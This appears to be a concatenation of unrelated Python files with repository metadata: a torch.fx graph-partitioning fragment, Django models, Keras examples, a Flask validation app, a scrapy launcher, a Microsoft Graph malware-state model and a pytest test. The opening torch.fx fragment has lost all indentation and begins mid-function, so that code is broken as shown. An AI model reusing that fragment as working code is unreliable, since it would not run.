def_partition_name = getattr(def_node, '_fx_partition', None)
use_partition_name = getattr(use_node, '_fx_partition', None)
if def_partition_name != use_partition_name:
if def_partition_name is not None:
def_partition = partitions[def_partition_name]
def_partition.outputs.setdefault(def_node.name)
if use_partition_name is not None:
def_partition.partition_dependents.setdefault(use_partition_name)
if use_partition_name is not None:
use_partition = partitions[use_partition_name]
use_partition.inputs.setdefault(def_node.name)
if def_partition_name is not None:
use_partition.partitions_dependent_on.setdefault(def_partition_name)
    # split nodes into partitions
for node in m.graph.nodes:
orig_nodes[node.name] = node
# TODO currently placeholders/parameters aren't put into random partitions,
# rather they're added to the graphs where they are used down below
if node.op in ["placeholder", "get_attr"]:
continue
if node.op == 'output':
torch.fx.graph.map_arg(node.args[0], lambda n: record_cross_partition_use(n, None)) # type: ignore[attr-defined]
continue
partition_name = str(split_callback(node))
# add node to partitions
partition = partitions.get(partition_name)
if partition is None:
partitions[partition_name] = partition = Partition(partition_name)
partition.node_names.append(node.name)
node._fx_partition = partition_name
torch.fx.graph.map_arg(node.args, lambda def_node: record_cross_partition_use(def_node, node)) # type: ignore[attr-defined]
torch.fx.graph.map_arg(node.kwargs, lambda def_node: record_cross_partition_use(def_node, node)) # type: ignore[attr-defined] # noqa: B950
# find partitions with no dependencies
root_partitions : List[str] = []
for partition_name, partition in partitions.items():
if not len(partition.partitions_dependent_on):
root_partitions.append(partition_name)
# check partitions for circular dependencies and create topological partition ordering
sorted_partitions : List[str] = []
while root_partitions:
root_partition = root_partitions.pop()
sorted_partitions.append(root_partition)
for dependent in partitions[root_partition].partition_dependents:
partitions[dependent].partitions_dependent_on.pop(root_partition)
if not partitions[dependent].partitions_dependent_on:
root_partitions.append(dependent)
if len(sorted_partitions) != len(partitions):
raise RuntimeError("cycle exists between partitions!")
    # add placeholders to partitions
for partition_name in sorted_partitions:
partition = partitions[partition_name]
for input in partition.inputs:
placeholder = partition.graph.placeholder(input)
placeholder.meta = orig_nodes[input].meta.copy()
partition.environment[orig_nodes[input]] = placeholder
# Transform nodes and collect targets for partition's submodule
for node in m.graph.nodes:
if hasattr(node, '_fx_partition'):
partition = partitions[node._fx_partition]
# swap out old graph nodes in kw/args with references to new nodes in this submodule
environment = partition.environment
gathered_args = torch.fx.graph.map_arg(node.args, lambda n : environment[n]) # type: ignore[attr-defined]
gathered_kwargs = torch.fx.graph.map_arg(node.kwargs, lambda n : environment[n]) # type: ignore[attr-defined]
if node.op not in ['call_module', 'get_attr']:
target = node.target
else:
target_atoms = node.target.split('.')
target_attr = m
for atom in target_atoms:
if not hasattr(target_attr, atom):
raise RuntimeError(f'Operator target {node.target} not found!')
target_attr = getattr(target_attr, atom)
# target = target_atoms[-1]
target = '_'.join(target_atoms)
partition.targets[target] = target_attr
assert isinstance(gathered_args, tuple)
assert isinstance(gathered_kwargs, dict)
new_node = partition.graph.create_node(op=node.op, target=target, args=gathered_args,
kwargs=gathered_kwargs)
new_node.meta = node.meta.copy()
partition.environment[node] = new_node
# Set up values to construct base module
base_mod_env : Dict[str, torch.fx.node.Node] = {} # type: ignore[name-defined]
base_mod_graph : torch.fx.graph.Graph = torch.fx.graph.Graph() # type: ignore[attr-defined, name-defined]
base_mod_attrs : Dict[str, torch.fx.graph_module.GraphModule] = {} # type: ignore[name-defined]
for node in m.graph.nodes:
if node.op == 'placeholder':
base_mod_env[node.name] = base_mod_graph.placeholder(node.name)
elif node.op == 'get_attr':
base_mod_env[node.name] = base_mod_graph.get_attr(node.target)
attr_val = m
for atom in node.target.split('.'):
if not hasattr(attr_val, atom):
raise RuntimeError(f'Node target {node.target} not found!')
attr_val = getattr(attr_val, atom)
base_mod_attrs[node.target] = attr_val
# Do some things iterating over the partitions in topological order again:
# 1) Finish off submodule Graphs by setting corresponding outputs
# 2) Construct GraphModules for each submodule
# 3) Construct the base graph by emitting calls to those submodules in
# topological order
for partition_name in sorted_partitions:
partition = partitions[partition_name]
# Set correct output values
output_vals = tuple(partition.environment[orig_nodes[name]] for name in partition.outputs)
output_vals = output_vals[0] if len(output_vals) == 1 else output_vals # type: ignore[assignment]
partition.graph.output(output_vals)
# Construct GraphModule for this partition
submod_name = f'submod_{partition_name}'
base_mod_attrs[submod_name] = torch.fx.graph_module.GraphModule(partition.targets, partition.graph) # type: ignore[attr-defined] # noqa: B950
# Emit call in base graph to this submodule
output_val = base_mod_graph.call_module(submod_name, tuple(base_mod_env[name] for name in partition.inputs))
if len(partition.outputs) > 1:
# Unpack multiple return values from submodule
output_val_proxy = torch.fx.proxy.Proxy(output_val) # type: ignore[attr-defined]
for i, output_name in enumerate(partition.outputs):
base_mod_env[output_name] = output_val_proxy[i].node # type: ignore[index]
else:
base_mod_env[list(partition.outputs)[0]] = output_val
for node in m.graph.nodes:
if node.op == 'output':
base_mod_graph.output(torch.fx.graph.map_arg(node.args[0], lambda n : base_mod_env[n.name])) # type: ignore[attr-defined] # noqa: B950
return torch.fx.graph_module.GraphModule(base_mod_attrs, base_mod_graph) # type: ignore[attr-defined]
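# Illustrative usage sketch (not part of the original file; MyModule and
# mod_partition are hypothetical names). split_module partitions a traced
# GraphModule according to the integer returned by split_callback per node:
#
#   import torch
#   from torch.fx import symbolic_trace
#
#   class MyModule(torch.nn.Module):
#       def forward(self, x):
#           return torch.relu(x) + torch.sigmoid(x)
#
#   traced = symbolic_trace(MyModule())
#   counter = {"n": 0}
#   def mod_partition(node):
#       counter["n"] += 1
#       return 0 if counter["n"] == 1 else 1  # first call op -> submod_0, rest -> submod_1
#
#   split = split_module(traced, MyModule(), mod_partition)
#   # split.submod_0 / split.submod_1 are GraphModules invoked in topological order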
| [
"[email protected]"
] | |
a17dee7c5fb944081c8050c5f45db1235e19af04 | ba7be04fa897785fb9255df3ece0c1ffbead6acc | /db_model/__models.py | 5e401af90c7c2baa39db7a572dafabe7e1a10704 | [] | no_license | backupalisher/part4_project | e1f402553502d010ffe974ecce73e313f90b8174 | 09ca16e3021aeac609fe6594e5c4f6c72832d112 | refs/heads/master | 2022-12-10T13:22:15.899332 | 2020-09-21T16:22:02 | 2020-09-21T16:22:02 | 233,295,277 | 0 | 0 | null | 2022-12-08T10:47:45 | 2020-01-11T20:49:10 | Python | UTF-8 | Python | false | false | 3,601 | py | from django.db import models
# Create your models here.
class Brands(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
logotype = models.CharField(max_length=255)
class Meta:
db_table = 'brands'
class Cartridge(models.Model):
id = models.IntegerField(primary_key=True)
title = models.CharField(max_length=255)
model = models.CharField(max_length=255)
code = models.CharField(max_length=255)
analogs = models.TextField()
techs = models.TextField()
brand_id = models.ForeignKey('Brands', on_delete=models.DO_NOTHING)
class Meta:
db_table = 'cartridge'
class Details(models.Model):
id = models.IntegerField(primary_key=True)
partcode_id = models.IntegerField()
model_id = models.IntegerField()
module_id = models.IntegerField()
spr_detail_id = models.IntegerField()
class Meta:
db_table = 'details'
class DetailOptions(models.Model):
id = models.IntegerField(primary_key=True)
caption_spr_id = models.IntegerField()
detail_option_spr_id = models.IntegerField()
parent_id = models.IntegerField()
icon = models.CharField(max_length=255)
value = models.IntegerField()
class Meta:
db_table = 'detail_options'
class FilterSettings(models.Model):
id = models.IntegerField(primary_key=True)
caption = models.CharField(max_length=255)
subcaption = models.CharField(max_length=255)
sub_id = models.IntegerField()
type = models.CharField(max_length=255)
values = models.TextField()
caption_en = models.CharField(max_length=255)
subcaption_en = models.CharField(max_length=255)
parent_id = models.IntegerField()
class Meta:
db_table = 'filter_settings'
class LinkDetailsOptions(models.Model):
detail_id = models.IntegerField()
detail_option_id = models.IntegerField()
spr_details_id = models.IntegerField()
class Meta:
db_table = 'link_details_options'
class LinkModelModules(models.Model):
model_id = models.IntegerField()
module_id = models.IntegerField()
class Meta:
db_table = 'link_model_modules'
class Models(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
brand_id = models.IntegerField()
main_image = models.ImageField()
image = models.TextField()
class Meta:
db_table = 'models'
verbose_name_plural = "Модели"
class Partcodes(models.Model):
id = models.IntegerField(primary_key=True)
code = models.TextField()
description = models.TextField()
images = models.CharField(max_length=1500)
class Meta:
db_table = 'partcodes'
class SprDetailOptions(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
icon = models.CharField(max_length=255)
class Meta:
db_table = 'spr_detail_options'
class SprDetails(models.Model):
id = models.IntegerField(primary_key=True)
name = models.TextField()
name_ru = models.TextField()
desc = models.TextField()
seo = models.TextField()
base_img = models.CharField(max_length=1500)
class Meta:
db_table = 'spr_details'
class SprModules(models.Model):
id = models.IntegerField(primary_key=True)
name = models.CharField(max_length=255)
name_ru = models.CharField(max_length=255)
description = models.CharField(max_length=1500)
scheme_picture = models.CharField(max_length=255)
class Meta:
db_table = 'spr_modules'
| [
"[email protected]"
] | |
223ba6282c9bc94c5ed8e642a43f151280243ba3 | bab8ce0d8b29292c8d6b0f2a6218b5ed84e7f98b | /account_cancel_with_reversal/tests/__init__.py | 658d50d7baed691aa4ea364101434b8fe6518ca1 | [] | no_license | ecosoft-odoo/ecosoft_v8 | 98e4116be3eceb287e2f3e9589d97155d5b8b745 | 71c56b0a102e340a5d80470243343654d8810955 | refs/heads/master | 2020-04-06T10:04:03.807855 | 2016-09-25T05:00:04 | 2016-09-25T05:00:04 | 51,049,848 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | # -*- coding: utf-8 -*-
from . import test_account_move_reverse
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
418af46acc26ae85ca432a2ce3ae0866495c20ba | 68b64faeb8394817e202567bce7dfc21c3ec8656 | /com/jian/keras/sequential_module.py | 49f8ea3b17585f06f36592a33671ab98b0ba32cc | [] | no_license | tianjiansmile/ML_filght | 04248d5a1f4108defdcc626e5de5e68692b4f1de | d60b422ba12945e4875d47e7730d10b1d2193d03 | refs/heads/master | 2020-05-26T21:59:59.773474 | 2020-05-07T04:59:34 | 2020-05-07T04:59:34 | 188,387,929 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 4,878 | py | from keras.layers import Input
from keras.models import Model
from keras.models import Sequential
from keras.layers import Dense, Activation
import keras
# Fully connected network
# This returns a tensor
inputs = Input(shape=(784,))
# a layer instance is callable on a tensor, and returns a tensor
x = Dense(64, activation='relu')(inputs)
x = Dense(64, activation='relu')(x)
predictions = Dense(10, activation='softmax')(x)
# This creates a model that includes
# the Input layer and three Dense layers
model = Model(inputs=inputs, outputs=predictions)
# Compile
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Train on dummy data (added so this snippet runs; the original called model.fit
# on undefined names -- the shapes are assumptions matching the 784-dim input and
# 10-way softmax above)
import numpy as np
data = np.random.random((1000, 784))
labels = keras.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)
model.fit(data, labels)  # starts training
# Fully connected network 2
# Specify the shape of the input data
model = Sequential()
model.add(Dense(32, input_dim=784))
model = Sequential()
model.add(Dense(32, input_shape=(784,)))
model.add(Activation('relu'))
# Compile
# For a multi-class classification problem
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Train
# Binary classification
model = Sequential()
model.add(Dense(32, activation='relu', input_dim=100))
model.add(Dense(1, activation='sigmoid'))
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['accuracy'])
# Generate dummy data
import numpy as np
data = np.random.random((1000, 100))
labels = np.random.randint(2, size=(1000, 1))
# Train the model, iterating on the data in batches of 32 samples
model.fit(data, labels, epochs=10, batch_size=32)
# Multi-class (categorical) classification:
model = Sequential()
model.add(Dense(32, activation='relu', input_dim=100))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
# Generate dummy data
import numpy as np
data = np.random.random((1000, 100))
labels = np.random.randint(10, size=(1000, 1))
# Convert labels to categorical one-hot encoding
one_hot_labels = keras.utils.to_categorical(labels, num_classes=10)
# Train the model, iterating on the data in batches of 32 samples
model.fit(data, one_hot_labels, epochs=10, batch_size=32)
# Softmax multi-class classification based on a multilayer perceptron:
# Generate dummy data
from keras.layers import Dropout
from keras.optimizers import SGD
x_train = np.random.random((1000, 20))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(1000, 1)), num_classes=10)
x_test = np.random.random((100, 20))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
model = Sequential()
# Dense(64) is a fully-connected layer with 64 hidden units.
# in the first layer, you must specify the expected input data shape:
# here, 20-dimensional vectors.
model.add(Dense(64, activation='relu', input_dim=20))
model.add(Dropout(0.5))
model.add(Dense(64, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=sgd,
metrics=['accuracy'])
model.fit(x_train, y_train,
epochs=20,
batch_size=128)
score = model.evaluate(x_test, y_test, batch_size=128)
# Convolutional neural network
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.optimizers import SGD
# Generate dummy data
x_train = np.random.random((100, 100, 100, 3))
y_train = keras.utils.to_categorical(np.random.randint(10, size=(100, 1)), num_classes=10)
x_test = np.random.random((20, 100, 100, 3))
y_test = keras.utils.to_categorical(np.random.randint(10, size=(20, 1)), num_classes=10)
model = Sequential()
# input: 100x100 images with 3 channels -> (100, 100, 3) tensors.
# 2D convolution layer, i.e. spatial convolution over images. This layer performs
# sliding-window convolution over 2D input; when used as the first layer of the
# model, the input_shape argument must be provided, e.g.
# input_shape=(100, 100, 3) for a 100x100 color RGB image.
# 32 convolution filters, each of size 3x3.
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(100, 100, 3)))
model.add(Conv2D(32, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(256, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(10, activation='softmax'))
sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy', optimizer=sgd)
model.fit(x_train, y_train, batch_size=32, epochs=10)
score = model.evaluate(x_test, y_test, batch_size=32)
| [
"[email protected]"
] | |
b321d4867fffc42d14b955f41cfad9b8315c7d46 | 9206651d6b1acb483040dff19929851ce261bc73 | /src/lecture4/notes/classes3.py | 8403a8d3951fba3134667204a5528af74aff4485 | [] | no_license | Farooq-azam-khan/web-programming-with-python-and-javascript | eee8556b37b8f8bb4f420ce9d4949441fbf456dd | 0875982ecbbb2bfd37e7b41a09a43623ee6d5a96 | refs/heads/master | 2022-12-10T15:31:39.703121 | 2018-07-18T06:51:02 | 2018-07-18T06:51:02 | 138,975,972 | 0 | 0 | null | 2022-12-08T02:12:59 | 2018-06-28T06:29:26 | HTML | UTF-8 | Python | false | false | 627 | py | class Flight:
def __init__(self, origin, destination, duration):
self.origin = origin
self.destination = destination
self.duration = duration
def print_info(self):
print(f"origin: {self.origin}")
print(f"destination: {self.destination}")
print(f"duration: {self.duration}")
def delay(self, amount):
self.duration += amount
def main():
f1 = Flight("New York", "Paris", 500)
f2 = Flight("Toronto", "Paris", 400)
f1.print_info()
f1.delay(10)
f1.print_info()
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
df1c11b2140c9abaa45d0d6347c2d2721cc4c3ed | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/edurep/tests/harvest_metadata_command.py | 7130625099872e671ff9870ad67d353dce224021 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 2,105 | py | from core.tests.commands.harvest_metadata import TestMetadataHarvest, TestMetadataHarvestWithHistory
from core.constants import Repositories
from core.models import HarvestSource, Collection, Extension
from edurep.tests.factories import EdurepOAIPMHFactory
class TestMetadataHarvestEdurep(TestMetadataHarvest):
spec_set = "surfsharekit"
repository = Repositories.EDUREP
@classmethod
def setUpClass(cls):
super().setUpClass()
EdurepOAIPMHFactory.create_common_edurep_responses()
sharekit = HarvestSource.objects.get(id=1)
sharekit.repository = cls.repository
sharekit.spec = cls.spec_set
sharekit.save()
other = HarvestSource.objects.get(id=2)
other.repository = cls.repository
other.save()
extension = Extension.objects.get(id="5af0e26f-c4d2-4ddd-94ab-7dd0bd531751")
extension.id = extension.reference = "surfsharekit:oai:surfsharekit.nl:5af0e26f-c4d2-4ddd-94ab-7dd0bd531751"
extension.save()
class TestMetadataHarvestWithHistoryEdurep(TestMetadataHarvestWithHistory):
spec_set = "surfsharekit"
repository = Repositories.EDUREP
@classmethod
def setUpClass(cls):
super().setUpClass()
EdurepOAIPMHFactory.create_common_edurep_responses(include_delta=True)
sharekit = HarvestSource.objects.get(id=1)
sharekit.repository = cls.repository
sharekit.spec = cls.spec_set
sharekit.save()
other = HarvestSource.objects.get(id=2)
other.repository = cls.repository
other.save()
collection = Collection.objects.get(id=171)
collection.name = cls.spec_set
collection.save()
collection.documents \
.filter(properties__title="Using a Vortex | Wageningen UR") \
.update(reference="surfsharekit:oai:surfsharekit.nl:5be6dfeb-b9ad-41a8-b4f5-94b9438e4257")
collection.documents \
.filter(reference="5af0e26f-c4d2-4ddd-94ab-7dd0bd531751") \
.update(reference="surfsharekit:oai:surfsharekit.nl:5af0e26f-c4d2-4ddd-94ab-7dd0bd531751")
| [
"[email protected]"
] | |
ff86cf6de6529af0927862b17044cc444dd5d4b6 | a7288d7cce714ce3ddf3de464f959a2cb6c62e80 | /Flask/Validation/server.py | 53b50278ff6439f50a7c5be10f3f8892f29e1ddb | [] | no_license | jhflorey/Python | 94d898c9cfa05a941e0ac0c3506587ad494b76ab | 4d005000bb95ee4414a6aebef4cebdcbc13e4d99 | refs/heads/master | 2020-03-20T10:44:00.560147 | 2018-06-14T16:48:49 | 2018-06-14T16:48:49 | 137,382,015 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from flask import Flask, render_template, redirect, request, session, flash
app = Flask(__name__)
app.secret_key = 'JessicaSecret'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/process', methods=['POST'])
def process():
if len(request.form['name']) < 1:
flash("Name can't be empty!")
else:
print("Success! Your name is {}".format(request.form['name']))
return redirect('/')
app.run(debug=True) | [
"[email protected]"
] | |
1ae7147831e43416858f5a4d9cb8bb2156ed809b | 1ecde4178548f331f15717f245e3f657b58b9993 | /cyh_crawler/scrapySchool_England/scrapySchool_England/scrapySchool_England/main.py | 6a991c45461505cc2e4750caeff9610eac4cade2 | [] | no_license | gasbarroni8/python_spider | 296dcb7c3fd9dd028423fe5ec0a321d994478b15 | 7935fa462926bc8ea9bf9883bd15265dd0d3e6df | refs/heads/master | 2023-03-26T05:22:59.858422 | 2019-04-15T07:17:56 | 2019-04-15T07:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,495 | py | from scrapy import cmdline
# cmdline.execute("scrapy crawl SwanseaUniversityPrifysgolAbertawe_U".split())
# cmdline.execute("scrapy crawl SwanseaUniversityPrifysgolAbertawe_P".split())
# cmdline.execute('scrapy crawl gaokao'.split())
# cmdline.execute('scrapy crawl picture'.split())
# cmdline.execute('scrapy crawl UniversityOfSouthampton_P'.split())
# cmdline.execute('scrapy crawl UniversityOfStAndrews_P'.split())
# cmdline.execute('scrapy crawl UniversityOfGlasgow_P'.split())
cmdline.execute('scrapy crawl UniversityOfTheArtsLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfOxford_P'.split())
# cmdline.execute('scrapy crawl DeMontfortUniversity_P'.split())
# cmdline.execute('scrapy crawl BrunelUniversityLondon_P'.split())
# cmdline.execute('scrapy crawl HarperAdamsUniveristy_P'.split())
# cmdline.execute('scrapy crawl UniversityOfStirling_P'.split())
# cmdline.execute('scrapy crawl CoventryUniversity_P'.split())
# cmdline.execute('scrapy crawl CityUniversityOfLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfLiverpool_P'.split())
# cmdline.execute('scrapy crawl UniversityCollegeLondon_P'.split())
# cmdline.execute('scrapy crawl UniversityOfYork_P'.split())
# cmdline.execute('scrapy crawl DurhamUniversity_P'.split())
# cmdline.execute('scrapy crawl LondonSouthBankUniversity_P'.split())
# cmdline.execute('scrapy crawl ManchesterMetropolitanUniversity_P'.split())
# cmdline.execute('scrapy crawl MiddlesexUniversity_P'.split())
# cmdline.execute('scrapy crawl NewmanUniversity_P'.split())
# cmdline.execute('scrapy crawl NorthumbriaUniversity_P'.split())
# cmdline.execute('scrapy crawl NorwichUniversityoftheArts_P'.split())
# cmdline.execute('scrapy crawl OxfordBrookesUniversity_P'.split())
# cmdline.execute('scrapy crawl QueenMargaretUniversity_P'.split())
# cmdline.execute('scrapy crawl LiverpoolJohnMooresUniversity_P'.split())
# cmdline.execute('scrapy crawl LeedsBeckettUniversity_P'.split())
# cmdline.execute('scrapy crawl LeedsTrinityUniversity_P'.split())
# cmdline.execute('scrapy crawl StMaryUniversityTwickenham_P'.split())
# cmdline.execute('scrapy crawl StaffordshireUniversity_P'.split())
# cmdline.execute('scrapy crawl UlsterUniversity_P'.split())
# cmdline.execute('scrapy crawl UniversityForTheCreativeArts_P'.split())
# cmdline.execute('scrapy crawl AngliaRuskinUniversity_P'.split())
# cmdline.execute('scrapy crawl UniversityofBedfordshire_P'.split())
# cmdline.execute('scrapy crawl UniversityOfLeicester_P'.split()) | [
"[email protected]"
] | |
053fc23b9d1e676b148f8576250daae9dab76e85 | dfdb672bbe3b45175806928d7688a5924fc45fee | /Learn Python the Hard Way Exercises/ex6.py | bdc6a5f9f598451b3b7f4b3ccb790c295a9908c5 | [] | no_license | mathans1695/Python-Practice | bd567b5210a4d9bcd830607627293d64b4baa909 | 3a8fabf14bc65b8fe973488503f12fac224a44ed | refs/heads/master | 2023-01-01T13:49:05.789809 | 2020-10-26T02:37:05 | 2020-10-26T02:37:05 | 306,300,672 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 394 | py | x = "There are %d types of people." % 10
binary = "binary"
do_not = "don't"
y = "Those who know %s and those who %s." % (binary, do_not)
print x
print y
print "I said: %r." % x
print "I also said: '%s'." % y
hilarious = 0
joke_evaluation = "Isn't that joke so funny?! %s"
print joke_evaluation % hilarious
w = "This is the left side of..."
e = "a string with a right side."
print w + e
| [
"[email protected]"
] | |
62f623a3627d7ac22b6f30c255b956e2e37f1f30 | 1515be3015ad988278d5a095416c0a0066a02757 | /src/users/models/componentsschemasmicrosoft_graph_windowsdevicemalwarestateallof1.py | 31ab5b0ad3a8ead943f9d1569c1e9baa891b4228 | [
"MIT"
] | permissive | peombwa/Sample-Graph-Python-Client | 2ad494cc5b5fe026edd6ed7fee8cac2dd96aaa60 | 3396f531fbe6bb40a740767c4e31aee95a3b932e | refs/heads/master | 2020-12-29T09:50:38.941350 | 2020-02-05T22:45:28 | 2020-02-05T22:45:28 | 238,561,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ComponentsschemasmicrosoftGraphWindowsdevicemalwarestateallof1(Model):
"""windowsDeviceMalwareState.
Malware detection entity.
:param display_name: Malware name
:type display_name: str
:param additional_information_url: Information URL to learn more about the
malware
:type additional_information_url: str
:param severity: Possible values include: 'unknown', 'low', 'moderate',
'high', 'severe'
:type severity: str or ~users.models.enum
:param catetgory: Possible values include: 'invalid', 'adware', 'spyware',
'passwordStealer', 'trojanDownloader', 'worm', 'backdoor',
'remoteAccessTrojan', 'trojan', 'emailFlooder', 'keylogger', 'dialer',
'monitoringSoftware', 'browserModifier', 'cookie', 'browserPlugin',
'aolExploit', 'nuker', 'securityDisabler', 'jokeProgram',
'hostileActiveXControl', 'softwareBundler', 'stealthNotifier',
'settingsModifier', 'toolBar', 'remoteControlSoftware', 'trojanFtp',
'potentialUnwantedSoftware', 'icqExploit', 'trojanTelnet', 'exploit',
'filesharingProgram', 'malwareCreationTool', 'remote_Control_Software',
'tool', 'trojanDenialOfService', 'trojanDropper', 'trojanMassMailer',
'trojanMonitoringSoftware', 'trojanProxyServer', 'virus', 'known',
'unknown', 'spp', 'behavior', 'vulnerability', 'policy',
'enterpriseUnwantedSoftware', 'ransom', 'hipsRule'
:type catetgory: str or ~users.models.enum
:param execution_state: Possible values include: 'unknown', 'blocked',
'allowed', 'running', 'notRunning'
:type execution_state: str or ~users.models.enum
:param state: Possible values include: 'unknown', 'detected', 'cleaned',
'quarantined', 'removed', 'allowed', 'blocked', 'cleanFailed',
'quarantineFailed', 'removeFailed', 'allowFailed', 'abandoned',
'blockFailed'
:type state: str or ~users.models.enum
:param threat_state: Possible values include: 'active', 'actionFailed',
'manualStepsRequired', 'fullScanRequired', 'rebootRequired',
'remediatedWithNonCriticalFailures', 'quarantined', 'removed', 'cleaned',
'allowed', 'noStatusCleared'
:type threat_state: str or ~users.models.enum
:param initial_detection_date_time: Initial detection datetime of the
malware
:type initial_detection_date_time: datetime
:param last_state_change_date_time: The last time this particular threat
was changed
:type last_state_change_date_time: datetime
:param detection_count: Number of times the malware is detected
:type detection_count: int
:param category: Possible values include: 'invalid', 'adware', 'spyware',
'passwordStealer', 'trojanDownloader', 'worm', 'backdoor',
'remoteAccessTrojan', 'trojan', 'emailFlooder', 'keylogger', 'dialer',
'monitoringSoftware', 'browserModifier', 'cookie', 'browserPlugin',
'aolExploit', 'nuker', 'securityDisabler', 'jokeProgram',
'hostileActiveXControl', 'softwareBundler', 'stealthNotifier',
'settingsModifier', 'toolBar', 'remoteControlSoftware', 'trojanFtp',
'potentialUnwantedSoftware', 'icqExploit', 'trojanTelnet', 'exploit',
'filesharingProgram', 'malwareCreationTool', 'remote_Control_Software',
'tool', 'trojanDenialOfService', 'trojanDropper', 'trojanMassMailer',
'trojanMonitoringSoftware', 'trojanProxyServer', 'virus', 'known',
'unknown', 'spp', 'behavior', 'vulnerability', 'policy',
'enterpriseUnwantedSoftware', 'ransom', 'hipsRule'
:type category: str or ~users.models.enum
"""
_validation = {
'detection_count': {'maximum': 2147483647, 'minimum': -2147483648},
}
_attribute_map = {
'display_name': {'key': 'displayName', 'type': 'str'},
'additional_information_url': {'key': 'additionalInformationUrl', 'type': 'str'},
'severity': {'key': 'severity', 'type': 'str'},
'catetgory': {'key': 'catetgory', 'type': 'str'},
'execution_state': {'key': 'executionState', 'type': 'str'},
'state': {'key': 'state', 'type': 'str'},
'threat_state': {'key': 'threatState', 'type': 'str'},
'initial_detection_date_time': {'key': 'initialDetectionDateTime', 'type': 'iso-8601'},
'last_state_change_date_time': {'key': 'lastStateChangeDateTime', 'type': 'iso-8601'},
'detection_count': {'key': 'detectionCount', 'type': 'int'},
'category': {'key': 'category', 'type': 'str'},
}
def __init__(self, display_name=None, additional_information_url=None, severity=None, catetgory=None, execution_state=None, state=None, threat_state=None, initial_detection_date_time=None, last_state_change_date_time=None, detection_count=None, category=None):
super(ComponentsschemasmicrosoftGraphWindowsdevicemalwarestateallof1, self).__init__()
self.display_name = display_name
self.additional_information_url = additional_information_url
self.severity = severity
self.catetgory = catetgory
self.execution_state = execution_state
self.state = state
self.threat_state = threat_state
self.initial_detection_date_time = initial_detection_date_time
self.last_state_change_date_time = last_state_change_date_time
self.detection_count = detection_count
self.category = category
| [
"[email protected]"
] | |
7cd31f6504ec6f2a009af57d51a4d7882dc91bc5 | 27398b2a8ed409354d6a36c5e1d2089dad45b4ac | /tests/common/models/test_token.py | 8bdba91a77d0c587046d5ccedb7bbbd587801a7c | [
"Apache-2.0"
] | permissive | amar266/ceph-lcm | e0d6c1f825f5ac07d2926bfbe6871e760b904340 | 6b23ffd5b581d2a1743c0d430f135261b7459e38 | refs/heads/master | 2021-04-15T04:41:55.950583 | 2018-03-23T12:51:26 | 2018-03-23T12:51:26 | 126,484,605 | 0 | 0 | null | 2018-03-23T12:50:28 | 2018-03-23T12:50:27 | null | UTF-8 | Python | false | false | 2,667 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2016 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module contains tests for decapod_common.models.token."""
import pytest
from decapod_common.models import token
def test_create_token_in_db(configure_model, pymongo_connection, freeze_time):
user_id = pytest.faux.gen_uuid()
new_token = token.TokenModel.create(user_id)
db_token = pymongo_connection.db.token.find_one({"_id": new_token._id})
assert db_token
assert new_token.user_id == db_token["user_id"]
assert new_token.expires_at == db_token["expires_at"]
assert new_token.model_id == db_token["model_id"]
assert new_token.initiator_id == db_token["initiator_id"]
assert new_token.version == db_token["version"]
assert new_token.initiator_id == db_token["initiator_id"]
